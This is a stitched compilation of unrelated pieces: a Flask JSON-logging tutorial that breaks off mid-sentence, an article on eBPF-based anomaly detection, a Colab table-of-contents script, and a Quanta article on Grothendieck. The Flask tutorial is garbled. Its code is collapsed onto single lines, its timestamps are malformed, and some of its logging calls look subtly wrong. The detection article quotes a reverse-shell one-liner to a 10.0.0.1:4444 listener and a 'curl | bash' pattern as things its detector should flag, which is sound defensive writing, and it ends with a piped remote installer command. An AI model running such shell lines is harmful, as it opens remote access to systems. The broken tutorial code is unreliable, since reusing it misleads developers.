Roughly 80% of Flask applications still rely on basic `print()`

statements or unstructured `logging.info()`

calls for observability in production. Despite widespread adoption of modern monitoring tools like Datadog, Loki, and Elasticsearch, most Python web apps ship logs as plain text — making debugging slow, filtering unreliable, and alerting brittle. This isn’t a legacy issue; it’s happening in brand-new Flask services today.

**📑 Table of Contents**

- ⚙️ Built-in Logging — Why
*Structure*Matters - 🐍 Loguru — Simpler, More
*Expressive*Setup - 🧠 Context Propagation — Keeping Data Across Functions
- 🔧 Handling Exceptions — Auto-JSON Tracebacks
- 📦 Flask Integration —
*Seamless*Middleware Injection - 💡 Filtering Noise — Exclude Health Checks
- 🔐 Security — Avoid Logging Sensitive Data
- 🔍 Production Best Practices — Making Logs
*Actionable* - 📦 Deployment — Logging in Docker & Kubernetes
- 📉 Monitoring — Querying Structured Logs
- 🟩 Final Thoughts
- ❓ Frequently Asked Questions
- Can I use both Python logging and Loguru in the same app?
- How do I rotate JSON log files in production?
- Are JSON logs slower than plain text?
- 📚 References & Further Reading

## ⚙️ Built-in Logging — Why *Structure* Matters

The Python `logging`

module is not a thin wrapper around `print()`

— it’s a fully composable system for routing, formatting, and filtering log records based on severity, source, and custom context. Every log call (e.g., `logger.info("User logged in")`

) creates a `LogRecord`

object. This record contains metadata — timestamp, filename, line number, function name, log level — before any formatter processes it. That metadata enables deterministic serialization into JSON without context loss. To emit structured output, replace the default `logging.Formatter`

with one that serializes the record.

``` python
import logging
import json
import sys class JsonFormatter(logging.Formatter): def format(self, record): log_entry = { "timestamp": self.formatTime(record, self.datefmt), "level": record.levelname, "logger": record.name, "module": record.module, "function": record.funcName, "line": record.lineno, "message": record.getMessage(), } if record.exc_info: log_entry["exception"] = self.formatException(record.exc_info) return json.dumps(log_entry) # Configure root logger
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(JsonFormatter())
logging.basicConfig(handlers=[handler], level=logging.INFO) logger = logging.getLogger("flask_app")
```

Now, when you log:

```
logger.info("User login attempted", extra={"user_id": 123, "ip": "192.168.1.1"})
```

You get:

```
{"timestamp": "-11-15 14:22:30,123", "level": "INFO", "logger": "flask_app", "module": "auth", "function": "login", "line": 45, "message": "User login attempted", "user_id": 123, "ip": "192.168.1.1"}
```

The `extra`

dictionary is merged into the top level of the JSON output because those keys become attributes on the `LogRecord`

instance. This behavior is consistent and predictable — no additional configuration needed.

## 🐍 Loguru — Simpler, More *Expressive* Setup

The standard `logging`

module requires boilerplate and careful handler management. Loguru reduces that surface area with better defaults, cleaner composition, and native support for structured output. Its core abstraction is the **sink** — a generalized destination for log events. Sinks can be streams, files, or network endpoints, and each can have its own format, filter, and serialization logic. Install it:

``` bash
$ pip install loguru

Collecting loguru Downloading loguru-0.7.2-py3-none-any.whl (58 kB)
Installing collected packages: loguru
Successfully installed loguru-0.7.2
```

Configure JSON output:

``` python
from loguru import logger
import sys
import json # Remove default handler
logger.remove() # Add JSON sink
logger.add( sys.stdout, format=lambda record: json.dumps({ "time": record["time"].isoformat(), "level": record["level"].name, "message": record["message"], "module": record["module"], "function": record["function"], "line": record["line"], **record["extra"] }), level="INFO"
)
```

Loguru supports contextual binding via `bind()`

:

``` python
@app.route("/login", methods=["POST"])
def login(): user_id = authenticate(request.json) if user_id: authenticated_logger = logger.bind(user_id=user_id, ip=request.remote_addr) authenticated_logger.info("User authenticated") return {"status": "ok"} else: logger.warning("Login failed", ip=request.remote_addr) return {"status": "unauthorized"}, 401
```

Output:

```
{"time": "-11-15T14:25:10.123456+00:00", "level": "INFO", "message": "User authenticated", "module": "app", "function": "login", "line": 23, "user_id": 456, "ip": "192.168.1.1"}
```

`bind()`

attaches key-value pairs to the logger instance, propagating them across all subsequent log calls from that instance. This avoids repetitive `extra`

kwargs and reduces error surface.

Structured logging isn’t about format — it’s about making every log line queryable, filterable, and traceable.

### 🧠 Context Propagation — Keeping Data Across Functions

In Flask, request-scoped data like trace IDs or user identifiers should appear in all logs for that request without manual pass-through. Loguru integrates with Python’s `contextvars`

to maintain state across async and threaded contexts. Use `patch()`

to inject bound data into every log record within the request lifecycle.

``` python
from flask import g @app.before_request
def attach_log_context(): trace_id = request.headers.get("X-Trace-ID", "unknown") logger.bind(trace_id=trace_id).patch(lambda record: None) @app.after_request
def clear_context(response): logger.unbind("trace_id") return response
```

After binding, every `logger.info()`

or `logger.error()`

call within the request includes the `trace_id`

field. This aligns logs across functions and services during incident investigation.

### 🔧 Handling Exceptions — Auto-JSON Tracebacks

Loguru captures full stack traces by default when using `logger.exception()`

:

```
try: risky_operation()
except Exception: logger.exception("Operation failed")
```

Output includes:

```
"exception": "Traceback (most recent call last):\\n File \"app.py\", line 30, in login\\n risky_operation()\\n File \"utils.py\", line 12, in risky_operation\\n raise ValueError('Boom')\\nValueError: Boom"
```

For non-critical paths, use the `@logger.catch`

decorator:

``` python
@logger.catch
def risky_operation(): return 1 / 0
```

This logs the traceback and prevents the exception from halting execution. Useful for optional processing or background tasks where failure shouldn't crash the request.

## 📦 Flask Integration — *Seamless* Middleware Injection

To gain observability at the HTTP layer, capture request metadata — method, path, status, duration — automatically. Use Flask’s `before_request`

and `after_request`

hooks to wrap each incoming request.

``` python
from time import time
from flask import request, g @app.before_request
def start_timer(): g.start = time() logger.bind(method=request.method, path=request.path, ip=request.remote_addr).patch(lambda record: None) @app.after_request
def log_request(response): duration = time() - g.start logger.info( "Request completed", status=response.status_code, duration=f"{duration:.4f}s", length=response.content_length or "-" ) return response
```

Example output:

```
{"time": "-11-15T14:30:00.123456+00:00", "level": "INFO", "message": "Request completed", "module": "app", "function": "log_request", "line": 45, "method": "POST", "path": "/login", "ip": "192.168.1.1", "status": 200, "duration": "0.1234s", "length": "15"}
```

This adds full request observability without touching application logic.

### 💡 Filtering Noise — Exclude Health Checks

Health endpoints like `/health`

or `/metrics`

generate high-volume, low-value logs. Filter them early to reduce noise and storage cost. Skip binding and timing for known endpoints:

``` python
@app.before_request
def start_timer(): if request.path in ["/health", "/metrics"]: return g.start = time() logger.bind(method=request.method, path=request.path, ip=request.remote_addr).patch(lambda record: None)
```

Alternatively, disable logging per route using a decorator:

``` python
def no_log(func): def wrapper(*args, **kwargs): with logger.disabled(): return func(*args, **kwargs) return wrapper @app.route("/health")
@no_log
def health(): return "OK"
```

### 🔐 Security — Avoid Logging Sensitive Data

Never log passwords, authentication tokens, or personally identifiable information (PII). Sanitize request payloads before inclusion:

```
safe_data = {k: v for k, v in request.json.items() if k not in {"password", "token"}}
logger.bind(body=safe_data).info("Login request received")
```

Prefer allowlists over denylists:

```
logged_fields = {k: request.json[k] for k in ["email", "country"] if k in request.json}
```

This ensures only explicitly permitted fields enter the log stream.

## 🔍 Production Best Practices — Making Logs *Actionable*

Structured logs only deliver value if used correctly in production environments. First, always emit logs to `stdout`

. Container orchestrators like Kubernetes expect applications to write logs to standard output so agents (e.g., Fluentd, Vector, Filebeat) can collect and forward them. Avoid writing directly to files. Second, standardize field names. Use consistent keys such as `http.method`

, `http.status_code`

, `user.id`

, and `trace.id`

across services. This enables reusable dashboards and alerting rules in tools like Grafana or Datadog. Third, adopt correlation IDs. Generate a unique ID per request and propagate it through logs and downstream services.

``` python
import uuid @app.before_request
def add_correlation_id(): cid = request.headers.get("X-Correlation-ID") or str(uuid.uuid4()) logger.bind(correlation_id=cid) g.correlation_id = cid @app.after_request
def add_correlation_header(response): response.headers["X-Correlation-ID"] = g.correlation_id return response
```

Fourth, manage log levels rigorously. Use `DEBUG`

for detailed traces, `INFO`

for operational milestones, `WARNING`

for recoverable anomalies, and `ERROR`

for failures. Apply level filtering at the sink:

```
logger.add(sys.stdout, level="INFO", serialize=True)
```

Fifth, consider performance. JSON serialization adds measurable CPU overhead under load. For high-throughput services, use `orjson`

— an optimized JSON library written in Rust.

``` python
import orjson def json_serializer(obj): return orjson.dumps(obj).decode()
```

`orjson`

is up to 50× faster than the standard `json`

module and handles common types like `datetime`

and `dataclass`

natively.

### 📦 Deployment — Logging in Docker & Kubernetes

In Kubernetes, pod logs are scraped from `stdout`

by default. No custom configuration is required if your app emits JSON. Verify output:

``` bash
$ kubectl logs my-flask-pod-7x9f2

{"time": "-11-15T14:35:00.123456+00:00", "level": "INFO", "message": "Request completed", "method": "GET", "path": "/api/users", "status": 200}
```

Ensure your log agent parses JSON correctly. For Fluentd, use `parser-type: json`

. For Grafana Loki, configure `pipeline_stages`

in your agent to extract structured labels.

### 📉 Monitoring — Querying Structured Logs

With JSON logs, you move from text scanning to precise querying. In **Loki** :

"

In

{job="flask"} | json | level="ERROR" and path="/login"

"**Datadog** :

"

In

service:flask @level:ERROR @http.status_code:5xx

"**Elasticsearch** :

"`json `

Filtering by

{"query": {"term": {"http.status_code": "500"}}}

"`status:500`

or `path:/login`

executes in milliseconds instead of scanning gigabytes of text. That precision is the core advantage of structured logging.

Good logs don’t just tell you what failed — they tell you who, when, where, and how it mattered.

## 🟩 Final Thoughts

Adding structured JSON logging to a Flask app isn’t a refactor — it’s a shift in how you treat logs. They become first-

---
## Detecting unusual processes on your servers without writing a single rule

> Published: 2026-05-24 03:27:41+00:00
> Source: https://dev.to/gretl/detecting-unusual-processes-on-your-servers-without-writing-a-single-rule-2he
> wpnews: https://wpnews.pro/news/detecting-unusual-processes-on-your-servers-without-writing-a-single-rule

Here is a factual summary of the article:

The article describes a system for detecting unusual server processes that learns what "normal" behavior looks like automatically, eliminating the need for manually written security rules. It uses eBPF to capture process execution data at the kernel level, converts each event into a vector using feature hashing for similarity comparison, and stores the data in LanceDB to identify deviations from established baselines. The authors argue this approach catches novel attacks and forgotten processes that traditional rule-based tools like Falco or Wazuh would miss.

Most security tooling works by asking you to define what "bad" looks like upfront. Falco gives you YAML rules. OSSEC has signatures. Wazuh has a 5,000-line ruleset that ships with the product and still misses half of what matters in your specific environment.

The problem isn't that rules are bad — it's that they can only catch what someone already thought to write a rule for. A novel attack, an unusual deployment pattern, or a rogue process your team introduced six months ago and forgot about will all sail straight through.

We wanted something different: a system that learns what "normal" looks like on each server and workload automatically, and flags anything that deviates — without any configuration.

Here's how we built it using eBPF and LanceDB.

Step 1: Capture everything at the kernel level with eBPF

eBPF lets you attach programs to kernel events with minimal overhead. We attach to the sys_enter_execve tracepoint, which fires every time any process is executed on the machine — before the process even starts running.

For each execution we capture:

The process name (comm) and full command line (argv)

The parent process name

The UID of the calling process

Any active network connections (src/dst IP, port)

This is written in Rust using the Aya framework, which compiles the eBPF kernel program separately and loads it at runtime:

# [tracepoint]

pub fn gretl_execve(ctx: TracePointContext) -> u32 {

let filename_ptr = unsafe { ctx.read_at::(16)? } as *const u8;

let pidtgid = bpf_get_current_pid_tgid();

let pid = (pidtgid >> 32) as u32;

``` js
let mut event = ExecveEvent {
    pid,
    comm:     [0u8; 16],
    filename: [0u8; 64],
    argv1:    [0u8; 64],
    // ...
};

if let Ok(comm) = bpf_get_current_comm() {
    event.comm = comm;
}

emit_execve(&event)
```

}

The events are written to a ring buffer and consumed by the userspace agent, which batches them and POSTs to the backend every 60 seconds. On kernel ≥ 5.8 with BTF enabled, zero instrumentation is required — no agents inside your containers, no sidecars, no changes to your application code.

For servers without eBPF support, the Node.js agent falls back to reading /proc//cmdline and /proc//status directly, tracking new PIDs each interval. You lose the real-time kernel hook but still get the process telemetry.

Step 2: Represent each process execution as a vector

The raw event — a process name, a cmdline string, a parent process, a port — isn't directly comparable. To measure similarity between executions, we need to turn each event into a fixed-length vector.

We use feature hashing: tokenise the event fields, hash each token into a position in a 128-dimensional vector, and accumulate signed contributions. The result is normalised to a unit vector.

function featureVector(event: ProcessEvent): number[] {

const vec = new Float32Array(128);

const tokens = [

event.process_name,

event.parent_process,

event.event_type,

String(event.local_port),

String(event.remote_port),

...tokenise(event.cmdline), // split cmdline into meaningful tokens

];

for (let i = 0; i < tokens.length; i++) {

const t = tokens[i].toLowerCase().trim();

if (!t) continue;

const idx = hashStr(t, i * 31) % 128;

const sign = (hashStr(t, i * 31 + 1) & 1) ? 1 : -1;

vec[idx] += sign;

}

// L2 normalise so cosine distance is well-defined

let norm = 0;

for (let i = 0; i < 128; i++) norm += vec[i] * vec[i];

norm = Math.sqrt(norm) || 1;

return Array.from(vec).map(v => v / norm);

}

Feature hashing is deterministic, requires no external model, adds no latency, and works well for this kind of structured-text input. A bash -i >& /dev/tcp/... command and a normal bash --login invocation will land in very different regions of the vector space.

Why not use a neural embedding model?

We looked at this seriously. Models like all-MiniLM-L6-v2 (22 MB, 384 dims) or OpenAI's text-embedding-3-small would give richer semantic similarity — they know that sh and bash are both shells, that /tmp and /dev/shm are both writable scratch paths.

The problem is the operational cost at ingestion time. The agent reports process events roughly every 60 seconds per server. For a fleet of 50 servers that's ~3,000 events per hour, each needing an embedding call before it can be scored and stored. The options were:

Local model on the backend — works, but adds a cold-start dependency, ~200 MB of model weights on disk, and 5–20 ms of CPU per event. On a small Fly.io instance shared with the API server, that's noticeable.

External API (e.g. OpenAI) — adds network latency to every ingest request, a per-token cost that scales with fleet size, and a hard external dependency that can take your security pipeline down.

Feature hashing — runs in <0.1 ms, zero dependencies, no network calls, fully deterministic. The same input always produces the same vector, which also makes testing straightforward.

For this specific input — structured fields like process names, parent pids, cmdline tokens — feature hashing performs surprisingly well. bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 and bash --login land in very different regions of the vector space because their token sets barely overlap. That's all we need for anomaly scoring.

The embedding layer is intentionally isolated behind a single featureVector() function. Swapping it for a neural model later is a one-function change — the scoring logic, the LanceDB tables, and the API surface don't care what's inside it.

Step 3: Store and query with LanceDB

LanceDB is an embedded vector database — it runs inside your process, stores data on disk, and supports fast approximate nearest-neighbour search with no separate infrastructure required.

We create one LanceDB table per (org_id, workload) pair. Each row stores the 128-dim vector and a timestamp. The table grows as new events arrive and old entries are pruned after 7 days.

export async function scoreAndLearn(

org_id: string,

workload: string,

event: ProcessEvent,

): Promise {

const conn = await db();

const table = await getOrCreateTable(conn, tableName(org_id, workload));

const vec = featureVector(event);

// Find k=10 nearest neighbours in this workload's history

const results = await table.vectorSearch(vec).limit(10).toArray();

let score = 1.0; // default: completely unseen

if (results.length > 0) {

const distances = results.map(r =>

cosineDistance(vec, Array.from(r.vector))

);

const minDist = Math.min(...distances);

score = Math.min(1, minDist * 2); // scale to 0–1

}

// Add this event to the baseline for future comparisons

table.add([{ vector: vec, ts: Date.now() }]);

return score;

}

The anomaly score is 0 for something we've seen many times before, and 1 for something completely new. It gets stored alongside the event in ClickHouse so you can query, filter, and alert on it.

Step 4: Natural language search

Once every event is a vector, querying by description becomes trivial. We embed the search query using the same feature-hashing pipeline and run a nearest-neighbour search across all workload tables.

// In the dashboard Security tab:

// "show me anything that looks like a reverse shell"

POST /telemetry/security/search

{ "query": "reverse shell bash outbound connection" }

This returns the events whose vectors are closest to the query vector — semantically similar behaviour, not keyword matches. A process running bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 will score highly even if it doesn't contain the literal words "reverse shell".

What it looks like in practice

After running on a production server for a few days, the baseline learns what "normal" looks like: your web server process, your cron jobs, your deployment scripts. Then:

A developer accidentally leaves a debug shell running → anomaly score 0.85, flagged as warn

Your CI/CD pipeline runs a new build script for the first time → score 0.72 on first run, drops to 0.1 after the second run

Someone runs curl | bash as root → score 0.94, flagged immediately

Your usual nginx worker restarts → score 0.02, ignored

No rules were written for any of these. The system learned the baseline automatically and the deviations surfaced on their own.

The architecture in one diagram

Server Backend Storage

────── ─────── ───────

eBPF (kernel) ──execve──▶ /otlp/v1/events

│

/proc fallback ──────────▶ │

▼

featureVector()

│

▼

LanceDB (per workload) ──▶ anomaly_score

│

▼

ClickHouse.security_events

│

▼

Dashboard + NL search

What's next

The current embedding is purely structural — it knows that bash and sh are different tokens, but doesn't know they're semantically similar shells. Upgrading to a small neural embedding model (something like all-MiniLM-L6-v2) would improve natural language search quality significantly, especially for queries phrased in plain English rather than technical terms.

We're also working on per-workload alert thresholds — so a security-sensitive production workload can be configured to alert at score 0.6, while a noisy dev environment uses a higher threshold of 0.85.

Try it on your servers

The agent installs in one command and starts building a baseline immediately. Works on any Linux server — EC2, GCP, bare metal. eBPF on kernel ≥ 5.8, /proc fallback everywhere else.

GR_TOKEN=your-token bash <(curl -fsSL [https://gretl.dev/install-agent.sh](https://gretl.dev/install-agent.sh))

---
## This tool maps cell IDs to their corresponding headings and content. Standalone TOC Generator for Google Colab  Copyright (c) 2026 1abcdefggs Licensed under the MIT License  Source: https://github.com/1abcdefggs/cell-id-call GitHub: https://github.com/1abcdefggs

> Published: 2026-05-24 03:25:11+00:00
> Source: https://gist.github.com/1abcdefggs/21632dd1f3670e8d1506e4788ab514cc
> wpnews: https://wpnews.pro/news/this-tool-maps-cell-ids-to-their-corresponding-headings-and-content-standalone-c

This article describes a standalone Python script called `standalone_toc.py` that generates a table of contents for Google Colab notebooks. The tool helps users map cell IDs to their corresponding headings and content, making it easier to understand which cell an AI assistant like Gemini is referencing. Users can customize the output by filtering by cell type, searching by keyword or cell ID, and adjusting preview settings.

standalone_toc.py

      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      
Learn more about bidirectional Unicode characters

 
    Show hidden characters

# Copyright (c) 2026 1abcdefggs

# Licensed under the MIT License

# See LICENSE file in the project root for full license information

#!/usr/bin/env python3

"""

Standalone TOC Generator for Google Colab

This script generates a table of contents for Colab notebooks without requiring external modules.

Background:

When working with AI assistants like Gemini in Colab, they often reference Cell IDs when explaining

code or content. This tool helps you map Cell IDs to their corresponding headings and content,

making it easier to understand which cell the AI is referring to.

Usage:

1. Copy this code to a new cell in your Colab notebook

2. Run the cell to generate a table of contents

3. Customize parameters in generate_standalone_toc() as needed:

   - filter_type: "All", "Code", or "Markdown"

   - keyword: Search keyword (empty string for all cells)

   - match_mode: "Cell-ID" or "Content"

   - limit: Preview character limit (default: 70)

   - show_jump: Show jump links (True/False)

   - show_stats: Show statistics (True/False)

   - save_log: Save to "TOC Preview.md" (True/False)

Source: https://github.com/1abcdefggs/cell-id-call

"""

import IPython

import json

import os

from google.colab import _message

from IPython.display import display, HTML

def _extract_heading_preview_standalone(source, cell_type, limit):

    """Extract heading preview from cell source."""

    text = "".join(source) if isinstance(source, list) else str(source)

    text = text.strip().replace("\n", " ")

    if cell_type == "markdown" and text.startswith("#"):

        cleaned = text.lstrip("#").strip()

        if not cleaned: return "(Empty heading)"

        return f"**{cleaned[:limit]}**" if len(cleaned) > limit else f"**{cleaned}**"

    return f"{text[:limit]}..." if len(text) > limit else text

def generate_standalone_toc(filter_type, keyword, match_mode, limit, show_jump, show_stats, save_log):

    """Generate standalone TOC for Colab notebook."""

    resp = _message.blocking_request('get_ipynb')

    if not resp or 'ipynb' not in resp: return

    cells = resp['ipynb'].get('cells', [])

    # Precise ID and Alignment Logic

    processed_ids = []

    for c in cells:

        meta = c.get('metadata', {})

        cid = meta.get('colab', {}).get('id') or c.get('id') or meta.get('id') or "unknown"

        processed_ids.append(str(cid))

    max_id_len = max([len(cid) for cid in processed_ids]) if processed_ids else 12

    # Dynamic Column Width Calculation

    jump_link_base = "[Jump](#scrollTo=)"

    w_jump = max(len("Jump Link"), max_id_len + len(jump_link_base))

    w_id = max(len("Cell ID"), max_id_len + 2)

    h_jump = f" {('Jump Link').ljust(w_jump)} |" if show_jump else ""

    s_jump = f" {(':---').ljust(w_jump, '-')} |" if show_jump else ""

    header = f"| Type | Index |{h_jump} {('Cell ID').ljust(w_id)} | Heading / Preview |"

    sep = f"| :--- | :--- |{s_jump} {(':---').ljust(w_id, '-')} | :--- |"

    md_table = ["# 🔍 TOC Preview. Quick Navigation (Standalone)", f"Mode: `{match_mode}`, Filter: `{filter_type}`", header, sep]

    stats = {'markdown': 0, 'code': 0, 'total': len(cells)}

    match_count = 0

    for idx, cell in enumerate(cells):

        c_type = cell.get('cell_type', 'unknown')

        stats[c_type] = stats.get(c_type, 0) + 1

        if filter_type == "Code" and c_type != 'code': continue

        if filter_type == "Markdown" and c_type != 'markdown': continue

        cell_id = processed_ids[idx]

        source_text = "".join(cell.get('source', []))

        if keyword:

            if match_mode == "Cell-ID":

                if keyword != cell_id: continue

            else:

                if keyword.lower() not in source_text.lower(): continue

        match_count += 1

        preview = _extract_heading_preview_standalone(source_text, c_type, limit)

        icon = "📝" if c_type == 'markdown' else "💻"

        row = f"| {icon} | {idx:03d} |"

        if show_jump:

            row += f" {f'[Jump](#scrollTo={cell_id})'.ljust(w_jump)} |"

        row += f" {f'`{cell_id}`'.ljust(w_id)} | {preview} |"

        md_table.append(row)

    full_md = "\n".join(md_table)

    if save_log:

        with open("TOC Preview.md", "w", encoding="utf-8") as f: f.write(full_md)

    if show_stats: print(f"📊 Total: {stats['total']} | Matches: {match_count}")

    # UI Button with improved JS for copying

    js_content = json.dumps(full_md)

    button_id = "copy_btn_standalone"

    html_btn = f'''

    <div style="margin: 15px 0;">

        <button id="{button_id}" style="background: #1a73e8; color: white; padding: 10px 20px; border: none; border-radius: 4px; cursor: pointer; font-weight: bold;">

            📋 Copy TOC to Clipboard

        </button>

    </div>

    <script>

    (function() {{

        const btn = document.getElementById("{button_id}");

        if (!btn) return;

        btn.onclick = function() {{

            const text = {js_content};

            if (!navigator.clipboard) {{

               const textArea = document.createElement("textarea");

               textArea.value = text;

               document.body.appendChild(textArea);

               textArea.select();

               try {{ document.execCommand('copy'); }} catch (err) {{ }}

               document.body.removeChild(textArea);

            }} else {{

                navigator.clipboard.writeText(text).then(() {{

                    const original = btn.innerText;

                    btn.innerText = "✅ Copied!";

                    btn.style.background = "#34a853";

                    setTimeout(() => {{

                        btn.innerText = original;

                        btn.style.background = "#1a73e8";

                    }}, 2000);

                }});

            }}

        }};

    }})();

    </script>

    '''

    display(HTML(html_btn))

    print("\n" + full_md)

# Default configuration for standalone execution

if __name__ == "__main__":

    generate_standalone_toc(

        filter_type="All",

        keyword="",

        match_mode="Cell-ID",

        limit=70,

        show_jump=True,

        show_stats=True,

        save_log=True

    )

---
## Alexander Grothendieck Revolutionized 20th-Century Mathematics

> Published: 2026-05-24 03:19:02+00:00
> Source: https://www.quantamagazine.org/how-alexander-grothendieck-revolutionized-20th-century-mathematics-20260520/
> wpnews: https://wpnews.pro/news/alexander-grothendieck-revolutionized-20th-century-mathematics

Alexander Grothendieck revolutionized 20th-century mathematics by reorienting the field toward abstract relationships between objects rather than the objects themselves, most notably in algebraic geometry. His work, which included a landmark generalization of the Riemann-Roch theorem in 1957, introduced new terminology and constructions that transformed multiple areas of math, including number theory and topology. After producing thousands of pages of influential notes from the 1950s onward, he abruptly left his prestigious research post in 1970 and lived as a hermit in the Pyrenees until his death.

How Alexander Grothendieck Revolutionized 20th-Century Mathematics
Introduction
What Albert Einstein was to 20th-century physics, Alexander Grothendieck was to 20th-century mathematics. He is much less well known because math gets technical even more quickly than physics does. But as with Einstein, Grothendieck’s impact came not just from his own results, revolutionary though they were. His work also reoriented his entire discipline in radical new directions.
Grothendieck was intense and ascetic from his early days. Starting in the early 1950s, when he was in his 20s, he produced thousands of pages of formal and informal notes that changed the course of mathematics. Then in 1970, he quit. He left his post at a prestigious research institute just outside of Paris to teach at the provincial university in Montpellier where he studied as an undergraduate. He mostly stopped talking to other mathematicians. In the early 1990s, he moved to a small village in the Pyrenees, where he lived as a hermit.
Mathematicians are still grappling with the innovations he made half a century ago. His work pushed mathematics to a new level of abstraction by focusing on the relationships between objects rather than the objects themselves. “If there is one thing in mathematics which fascinates me more than any other (and undoubtedly always has), it is neither ‘number’ nor ‘size,’ but invariably shape,” he wrote in his memoirs. “And among the thousand and one faces under which shape chooses to reveal itself to us, that which has fascinated me more than any other and continues to do so is the structure hidden in mathematical things.”
His revolutionary mathematics centered around that search for hidden structure.
Revealing Shapes
Grothendieck is most famous for his work in algebraic geometry. The field first developed as the study of shapes defined by polynomial equations — equations that add together variables raised to fixed powers. These can be as simple as a line (x – y = 0) or a circle (x2 + y2 – 1 = 0). But as you consider more and more variables raised to higher powers and also look for solutions that satisfy sets of many equations instead of just one, things quickly get more complicated — and more abstract.
The discipline took flight in the late 19th century, when mathematicians started asking questions about what happens if instead of plugging ordinary numbers into your equations, you plug in numbers from other, more abstract sets.
Before Grothendieck, algebraic geometry was an interesting and vibrant subdiscipline within mathematics. But it was also somewhat in crisis, as the mathematician David Mumford later wrote. “Every researcher used his own definitions and terminology, in which the ‘foundations’ of the subject had been described in at least half a dozen different mathematical ‘languages.’”
Then “Grothendieck came along and turned a confused world of researchers upside down, overwhelming them with [a] new terminology … as well as with a huge production of new and very exciting results.”
Grothendieck is most famous for introducing mathematical constructions that helped him and others prove longstanding conjectures, and that eventually became central objects of study in their own right.
His work also put algebraic geometry in the center of a web of many other areas of math — among them topology, number theory, representation theory, and logic. “Grothendieck never worked directly in number theory,” said Brian Conrad of Stanford University, “but the ideas he introduced into algebraic geometry totally transformed how number theory is done.”
His first major result in algebraic geometry was his 1957 generalization of the Riemann-Roch theorem, a proof from a century earlier that dictates how the shape of a surface limits which functions can be defined on it. As Leila Schneps of the French National Center for Scientific Research wrote, Grothendieck’s proof “propelled him to instant stardom in the world of mathematics.”
Thanks to his techniques, “a whole new wealth of operations becomes available,” Conrad said. “It opens up a whole new way to think about why the theorem is true.”
Then, just as quickly, Grothendieck moved on to the next thing. At the 1958 International Congress of Mathematicians, he announced his intention to remake all of algebraic geometry. He was going to do it with something called a scheme.
A New Scheme of Mathematics
A decade earlier, the mathematician André Weil had conjectured a link between solutions to polynomial equations defined in two very different mathematical settings. The first was finite fields, number systems that operate according to a cyclical form of arithmetic. The second was complex numbers, which take our familiar, everyday numbers and add the square root of -1, called i.
Weil made four conjectures that related polynomials from one setting to those from the other. These conjectures, Conrad said, “sound like communication between parallel universes.”
As part of the effort to prove these conjectures, Grothendieck proposed his notion of a scheme. The attempted proofs were “a primary motivation for the theory of schemes,” said Daniel Litt of the University of Toronto, but “what it really bought you was a whole lot more.”
Before Weil, mathematicians only really talked about equations like x2 + y2 – 1 = 0 by specifying the particular number system they wanted to work in. The solutions to such equations would look quite different if x and y could only be integers, for example, versus if they could be any real number, or any complex number.
After Grothendieck came up with an explanation for why Weil’s conjectures are true, mathematicians came to believe that equations had meaningful structure independent of whether x and y were complex numbers, or elements of a finite field, or bananas. At first, this belief seems to make as little sense as saying that a sentence has meaning regardless of which language you choose its words from. But Grothendieck defined mathematical structures that made it possible to make such statements rigorous and even intuitive to those who mastered his new language.
As Conrad explained, “Grothendieck found the right way to define abstract notions of space, new ways of thinking about spaces.” He recognized that “the way you probe the geometry of a space is not by looking at the points, but by studying other things.”
That’s where Grothendieck’s schemes came into play. It takes some effort to construct even a simple scheme. But if you read on, it’s possible to understand what schemes are and develop an intuition for why they’re useful.
Schemes are geometric spaces that are built out of abstract algebraic ingredients.
Start with an abstract generalization of the integers called a ring. A ring is a set of elements that can be added, subtracted, and multiplied together, but that can’t always be divided. (In the ring of integers, for instance, you can’t divide 2 by 3, because 2/3 isn’t an integer.)
Now look at a subset of your ring that is “closed,” meaning that if you add or subtract two elements of the subset, the result is also in the subset. For example, take all multiples of 5. This subset is not only closed, it has another property: You can multiply any number in the ring by an element in the subset, and the result is inevitably also in the subset. That makes the subset what mathematicians call an ideal.
Moreover, if you multiply any two numbers from the ring and end up in this subset (3 × 5 = 15), then one of the numbers you multiplied (5) must have been in this subset, too, even though the other number (3) isn’t.
This second property makes the subset a prime ideal. (To see why, look at the multiples of 6. These form an ideal, but not a prime ideal, because 2 × 3 is in the ideal, but neither 2 nor 3 is.)
In the case of the integers, the prime ideals are sets of multiples corresponding to each of the prime numbers, along with zero. It’s possible to study the set of all the prime ideals of a ring as a single geometric space. First, represent each prime ideal as a point. Then define a “topology” on those points that puts them into neighborhoods, depending on their shared elements. (Strangely, the zero ideal ends up being “close” to every single prime, illustrating a previously unknown structure hidden behind the integers.)
Grothendieck’s innovation was to add a layer on top of this space — a recently discovered mathematical superstructure called a sheaf, which carries additional algebraic information.
At each point in your space, for instance, this sheaf attaches another set, called a stalk. Let’s return to one of the prime ideals of the integers: the point in our space representing the subset of all multiples of 5. The stalk attached to this point would contain all the fractions whose denominators are not divisible by 5. (The stalk attached to 0 contains all possible fractions.) In this simple example, it’s hard to see what the stalks accomplish, but in more elaborate schemes, computing the contents of stalks and the ways they interact with each other turned out to be a mathematically powerful machine.
This entire object — the space of prime ideals, with the sheaf (and all its stalks) built on top of it — is called an affine scheme. In general, schemes are constructed by gluing affine schemes together in a precise mathematical way.
So what does all that have to do with an equation like x2 + y2 – 1 = 0? Well, instead of starting with the ring of integers, you can study a particular ring associated with that polynomial. You can then build the scheme for that ring.
But crucially, the variables x and y can be whatever you want them to be: integers, real numbers, complex numbers, elements of a finite field. By studying the scheme’s properties, you can gain insight about the structure of the equation, independent of any particular number system. It is, impossible though it may sound, a way to study the sentence apart from the language its words are written in.
Broadly speaking, this is why Grothendieck and others could use schemes — and a series of ideas building on them — to re-prove one of the four Weil conjectures and prove two more. (Grothendieck’s student Pierre Deligne would later use other structures that Grothendieck developed to prove the fourth, which is a version of the famous Riemann hypothesis in the setting of finite fields.) Grothendieck continued to come up with even more abstract and powerful concepts, including topoi, stacks, motives, and étale cohomology. All play a major role in algebraic geometry and other areas of math today.
Schemes gave mathematicians a novel, systematic way to study the relationships between objects in algebraic geometry. And because schemes allow you to study rings, which appear all over math, as geometric spaces, they can be used to import geometric techniques into algebra, number theory, and beyond.
Grothendieck died in 2014 after years of solitude, estranged from the mathematical community he had helped create. Nonetheless, mathematicians remember him with reverent affection. As the Harvard mathematician Barry Mazur wrote, “During the early ’60s, his conversations had a secure calmness. He would oﬀer mathematical ideas with a smile that always had an expanse of generosity in it … a sense that ‘nothing could be easier in the world’ than to view things as he did.”
